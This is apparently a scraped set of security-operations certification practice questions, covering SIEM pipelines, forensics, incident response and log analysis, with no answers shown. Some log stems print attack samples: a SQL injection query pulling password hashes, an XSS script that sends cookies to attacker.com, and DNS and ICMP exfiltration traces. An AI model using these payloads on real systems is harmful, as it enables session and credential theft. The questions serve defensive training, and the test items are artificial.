Security Operations
627 questions
A security engineer is configuring a newly deployed Security Information and Event Management (SIEM) system to ingest and analyze multi-source telemetry across the enterprise network. Arrange the core stages of the SIEM log processing pipeline in the correct sequential order from initial intake to operational notice.
Drag items to arrange them in the correct order
A security analyst is auditing access logs following an unauthorized privilege escalation incident on a network perimeter gateway. The organization utilizes a centralized RADIUS server integrated with Directory Services for network access control. The authentication and authorization logs display the following consecutive events:
[TIMESTAMP: 2026-07-27T14:22:01Z] RADIUS-Auth: User 'j_doe' successfully authenticated via MS-CHAPv2.
[TIMESTAMP: 2026-07-27T14:22:02Z] RADIUS-Authz: Vendor-Specific Attribute (VSA) 'Cisco-AVPair = shell:priv-lvl=15' rejected due to policy schema syntax mismatch.
[TIMESTAMP: 2026-07-27T14:22:03Z] Gateway-Daemon: Fallback default authorization rule applied; assigned administrative profile (privilege level 15) to session 'j_doe'.
Which of the following operational vulnerabilities is the primary root cause of the unauthorized privilege escalation?
A digital forensics analyst has completed the imaging of a seized storage volume from an enterprise database server involved in a security incident. The analyst is preparing to transfer the physical evidence to an external forensic laboratory for detailed examination. Which of the following actions must the analyst take to maintain a valid chain of custody during this transfer? (Select TWO.)
Select all that apply
A Security Operations Center (SOC) analyst receives a high-priority alert indicating that an enterprise Voice over IP (VoIP) management server has established unauthorized outbound secure shell (SSH) sessions to an unknown external IP address and is attempting horizontal scanning across internal server subnets. The analyst inspects network logs and confirms that an active remote code execution exploit took place through the server's web administration panel. According to standard incident response playbooks, which of the following actions should the analyst perform FIRST?
A tier 2 incident responder analyzing endpoint telemetry observes an active fileless attack on an enterprise financial server, where an injected process is issuing unauthorized API calls to extract credentials and establish an outbound encrypted beacon. To effectively contain the active compromise and preserve critical evidence for incident triage without losing agent telemetry, which of the following response actions should the responder perform using EDR agent capabilities? (Select TWO.)
Select all that apply
A Security Operations Center (SOC) analyst receives a high-severity alert from a Network Intrusion Detection System (NIDS) monitoring outbound traffic from an internal corporate network segment. The log entry details are shown below:
`[2026-07-27 14:15:02] ALERT: ICMP_LARGE_PAYLOAD_ECHO | Src: 192.168.10.45 | Dst: 203.0.113.88 | Length: 1450 bytes | Rate: 1200 pkts/min | Payload_Header: 504b0304 (PK..)`
Based on this network security monitoring alert, which of the following conclusions and immediate response steps are most appropriate? (Select TWO.)
Select all that apply
A SOC analyst is reviewing web server access logs within a SIEM platform after an automated alert was generated. The analyst identifies the following log entries:
192.168.10.45 - - [27/Jul/2026:10:15:32 +0000] "GET /item.php?id=12%27%20UNION%20SELECT%20username,%20password_hash%20FROM%20users-- HTTP/1.1" 200 4812
192.168.10.45 - - [27/Jul/2026:10:15:40 +0000] "GET /item.php?id=12%27%20OR%201=1-- HTTP/1.1" 200 9520
Based on the log analysis, which security event has occurred?
During a routine security audit, a security engineer discovers that an internal data-processing application uses static, long-lived API keys embedded directly within source code to query a backend customer database. Additionally, the service account assigned to this application currently holds full database administrator privileges. To mitigate credential exposure risks and align with identity operational best practices, which of the following actions should the engineer take? (Select TWO.)
Select all that apply
An enterprise security team is configuring an automated Security Orchestration, Automation, and Response (SOAR) playbook to respond to high-confidence phishing alerts containing malicious URL links. The team wants to execute rapid containment and context enrichment while preventing self-inflicted operational outages. Which of the following automated actions should be incorporated into this playbook? (Select TWO.)
Select all that apply
During a routine security audit, a security analyst discovers that several Linux web servers hosted in an Infrastructure as a Service (IaaS) environment have diverged from the enterprise's hardened configuration baseline after manual hotfixes were applied by system administrators. Which of the following implementation strategies best provides automated drift detection and continuously enforces the designated configuration baseline across the server fleet?
A security technician inspecting web server access logs in a SIEM dashboard analyzes the following log entry:
`192.168.10.45 - - [27/Jul/2026:14:15:22 +0000] "GET /comment.php?user_input=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script> HTTP/1.1" 200 452`
Which of the following security events is demonstrated in this log snippet?
An organization deploys a centralized Security Information and Event Management (SIEM) platform to monitor enterprise infrastructure. In what sequence does a security log event travel through the SIEM pipeline from initial creation to analyst notification?
Drag items to arrange them in the correct order
A security analyst is establishing a patch and configuration management procedure for an air-gapped Industrial Control System (ICS) network following the disclosure of a critical firmware vulnerability. Which of the following technical controls and procedural steps should the analyst execute to ensure safe patch deployment and maintain system baselines? (Select TWO.)
Select all that apply
A security engineer is optimizing an enterprise Security Information and Event Management (SIEM) data ingestion pipeline to handle heterogeneous log streams from firewalls, web proxies, and endpoint agents. To perform cross-source security analytics without overwhelming system storage or failing complex detection logic, incoming event data must pass through sequential processing phases. What is the correct sequential order of log processing stages within the SIEM pipeline, from initial raw data ingestion to final security analyst escalation?
Drag items to arrange them in the correct order
A security analyst reviewing SIEM alert logs identifies the following sequential events originating from an internal workstation:
2026-07-27T14:02:11Z Event: DNS_QUERY SrcIP: 10.0.4.150 DstIP: 8.8.8.8 Query: c2FtcGxlZGF0YWV4Zmls.malicious-domain.com RecordType: TXT Length: 512
2026-07-27T14:02:12Z Event: DNS_QUERY SrcIP: 10.0.4.150 DstIP: 8.8.8.8 Query: dG9wc2VjcmV0ZG9jcw==.malicious-domain.com RecordType: TXT Length: 512
2026-07-27T14:02:13Z Event: DNS_QUERY SrcIP: 10.0.4.150 DstIP: 8.8.8.8 Query: cGFzc3dvcmRoYXNoZXM=.malicious-domain.com RecordType: TXT Length: 512
Which of the following security threats is directly indicated by these log entries?
A Security Operations Center (SOC) analyst investigating a high-severity alert in a SIEM platform correlates the following consecutive syslog entries from an internal recursive DNS resolver:
text
2026-07-27T14:22:01Z dns-resolver named[2048]: client 10.2.14.88#49152 (v1-a8f9c2d1e.exfil.external-collector.net): query: v1-a8f9c2d1e.exfil.external-collector.net IN TXT + (10.2.0.1)
2026-07-27T14:22:02Z dns-resolver named[2048]: client 10.2.14.88#49153 (v2-b7e8d3c4a.exfil.external-collector.net): query: v2-b7e8d3c4a.exfil.external-collector.net IN TXT + (10.2.0.1)
2026-07-27T14:22:03Z dns-resolver named[2048]: client 10.2.14.88#49154 (v3-f5a6b7c8d.exfil.external-collector.net): query: v3-f5a6b7c8d.exfil.external-collector.net IN TXT + (10.2.0.1)
Based on the log attributes, which of the following security events is occurring on host 10.2.14.88?
During a forensic investigation of a compromise on a critical database host, an incident handler needs to collect evidence while the system remains powered on. To minimize data loss, which of the following evidence acquisition steps should be executed FIRST according to the order of volatility?
A Security Operations Center (SOC) analyst receives a high-severity Endpoint Detection and Response (EDR) alert indicating an active living-off-the-land attack where a compromised workstation is attempting lateral movement via WMI and fileless memory injection. Arrange the following incident response containment and forensic actions in the correct sequential order from first step to last step.
Drag items to arrange them in the correct order
A security operations team is designing a vulnerability assessment strategy for a legacy operational technology (OT) network housing fragile programmable logic controllers (PLCs). Prior active network vulnerability scans against these devices caused unexpected buffer overflows, triggering critical system resets and operational downtime. Which of the following approaches should the analyst implement to safely identify known software vulnerabilities on these OT assets without risking system instability?
Match each vulnerability assessment scan approach with its corresponding operational description.
Click a left item, then click its matching right item
Items
Matches